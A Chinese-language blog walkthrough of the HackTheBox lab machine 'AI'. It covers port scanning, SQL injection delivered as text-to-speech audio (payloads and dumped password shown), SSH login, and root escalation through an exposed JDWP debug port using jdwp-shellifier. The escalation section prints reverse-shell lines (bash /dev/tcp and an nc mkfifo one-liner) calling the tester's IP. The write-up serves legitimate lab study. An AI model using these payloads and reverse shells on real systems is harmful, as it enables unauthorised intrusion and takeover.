hackthebox AI

发表于 更新于 阅读次数:
本文字数: 5.7k 阅读时长 ≈ 5 分钟

recon

nmap

1
nmap -sV -sT -sC -o nmapinitial ai.htb

masscan

1
masscan -p1-65535 10.10.10.163 --rate=1000 -e eth0

nmap实在太慢了,使用masscan发现开放了2280端口

gobuster 扫描网站路径

1
gobuster dir -u http://ai.htb/ -w /usr/share/wordlists/dirb/common.txt -x php

发现存在http://ai.htb/intelligence.php

从下图可以发现ai.pgp存在上传的页面

intelligence.php有一些使用其语音识别的说明

exploit

ffmpeg

使用ttsmp3.com生成音频文件,并创建了一个测试文件:

1
ffmpeg -i ttsMP3.com_VoiceText_2020-2-3_11_23_15.mp3 ttsMP3.com_VoiceText_2020-2-3_11_23_15.wav

上传显示创建的测试文件内容

这种方法有点麻烦,我们可以采用另一种方法

1
2
3
4
apt install apt-file
apt-file update
apt-file search text2wave
apt-get install festival //一步到位

然后生成wav文件

1
echo "test" | text2wave -o test.wav

sql

尝试单引号注入

1
ffmpeg -i ttsMP3.com_VoiceText_2020-2-3_12_25_27.mp3 ttsMP3.com_VoiceText_2020-2-3_12_25_27.wav

返回信息

1
2
Our understanding of your input is : it's a test
Query result : You have an error in your SQL syntax; check the manual that corresponds to your MySQL server version for the right syntax to use near 's a test'' at line 1

题目考察的是通过AI的解析出来的语句构造sql注入

这里实在想不懂,就直接从writeup摘抄下来了

payload:注入数据库

1
2
one open single quote union select database open parenthesis close parenthesis comment database
echo "one open single quote union select database open parenthesis close parenthesis comment database" | text2wave -o test.wav

得到响应

1
2
Our understanding of your input is : 1'union select database()-- -
Query result : alexa

数据库名称是alexa,接下来我要做的是枚举表名,

payload

1
2
one open single quote union select test from test comment database
echo "one open single quote union select test from test comment database" | text2wave -o test.wav

得到响应

1
2
Our understanding of your input is : 1'union select test from test -- -
Query result : Table 'alexa.test' doesn't exist

payload

1
one open single quote union select test from users comment database

得到响应

1
2
Our understanding of your input is : 1'union select test from users -- -
Query result : Unknown column 'test' in 'field list'

存在user表

payload

1
one open single quote union select username from users comment database

得到响应,没有

1
2
Our understanding of your input is : 1'union select user name from users -- -
Query result : Unknown column 'user' in 'field list'

payload

1
one open single quote union select password from users comment database

爆出password列的数据

1
2
Our understanding of your input is : 1'union select password from users -- -
Query result : H,Sq9t6}a<)?q93_

SSH as alexa

1
2
ssh alexa@ai.htb
password:H,Sq9t6}a<)?q93_

登陆成功

1
2
3
4
alexa@AI:~$ ls
user.txt
alexa@AI:~$ cat user.txt
c43b62c682a8c*******d4a2cda55e4b

Elevation

查看进程

1
2
alexa@AI:~$ ps aux | grep java
root      38409 17.6  5.6 3137572 113460 ?      Sl   08:56   0:03 /usr/bin/java -Djava.util.logging.config.file=/opt/apache-tomcat-9.0.27/conf/logging.properties -Djava.util.logging.manager=org.apache.juli.ClassLoaderLogManager -Djdk.tls.ephemeralDHKeySize=2048 -Djava.protocol.handler.pkgs=org.apache.catalina.webresources -Dorg.apache.catalina.security.SecurityListener.UMASK=0027 -agentlib:jdwp=transport=dt_socket,address=localhost:8000,server=y,suspend=n -Dignore.endorsed.dirs= -classpath /opt/apache-tomcat-9.0.27/bin/bootstrap.jar:/opt/apache-tomcat-9.0.27/bin/tomcat-juli.jar -Dcatalina.base=/opt/apache-tomcat-9.0.27 -Dcatalina.home=/opt/apache-tomcat-9.0.27 -Djava.io.tmpdir=/opt/apache-tomcat-9.0.27/temp org.apache.catalina.startup.Bootstrap start

查看开放端口8000,8080,8005,8009

1
2
3
4
5
6
7
8
9
10
11
12
13
14
alexa@AI:~$ netstat -ntlp
(Not all processes could be identified, non-owned process info
 will not be shown, you would have to be root to see it all.)
Active Internet connections (only servers)
Proto Recv-Q Send-Q Local Address           Foreign Address         State       PID/Program name
tcp        0      0 127.0.0.53:53           0.0.0.0:*               LISTEN      -
tcp        0      0 0.0.0.0:22              0.0.0.0:*               LISTEN      -
tcp        0      0 127.0.0.1:8000          0.0.0.0:*               LISTEN      -
tcp        0      0 127.0.0.1:3306          0.0.0.0:*               LISTEN      -
tcp6       0      0 127.0.0.1:8080          :::*                    LISTEN      -
tcp6       0      0 :::80                   :::*                    LISTEN      -
tcp6       0      0 :::22                   :::*                    LISTEN      -
tcp6       0      0 127.0.0.1:8005          :::*                    LISTEN      -
tcp6       0      0 127.0.0.1:8009          :::*                    LISTEN      -

通过再次查看该过程,我们还可以看到为java二进制文件提供了以下参数:

1
-agentlib:jdwp=transport=dt_socket,address=localhost:8000

我搜索了该jdwp服务的漏洞利用程序,然后发现了这个漏洞利用程序。我在alexa上传了python脚本,然后将反向shell有效负载添加到文件中,pwned.sh然后调用它,然后运行漏洞利用程序:

1
2
3
4
5
6
~/Desktop/Hackthebox/AI/pwn/jdwp-shellifier(master) # searchsploit jdwp         
------------------------------------------------- ------------------------------------
 Exploit Title                                   |  Path
                                                 | (/usr/share/exploitdb/)
------------------------------------------------- ------------------------------------
Java Debug Wire Protocol (JDWP) - Remote Code Ex | exploits/java/remote/46501.py

上传脚本pwned.sh还有jdwp-shellifier

1
2
3
4
5
scp -r pwned.sh alexa@ai.htb:/home/alexa //输入密码即可上传道指定的目录
alexa@AI:~/pwn/jdwp-shellifier$ cat /home/alexa/pwned.sh
#!/bin/bash
bash -i >& /dev/tcp/10.10.14.23/1337 0>&1
//本来使用rm /tmp/f;mkfifo /tmp/f;cat /tmp/f|/bin/sh -i 2>&1|nc 10.10.14.23 1337 >/tmp/f这条命令的一直无法反弹shell

执行命令

1
python jdwp-shellifier.py -t 127.0.0.1 --cmd /home/alexa/pwned.sh

然后kali重新连接一个ssh

1
nc localhost 8005

成功 拿到root权限

在家的宽带非常垃圾,做一些扫描测试的时候经常Timeoout

Reference:

Hacking the Java Debug Wire Protocol – or – “How I met your Java debugger”

-------------本文结束感谢您的阅读-------------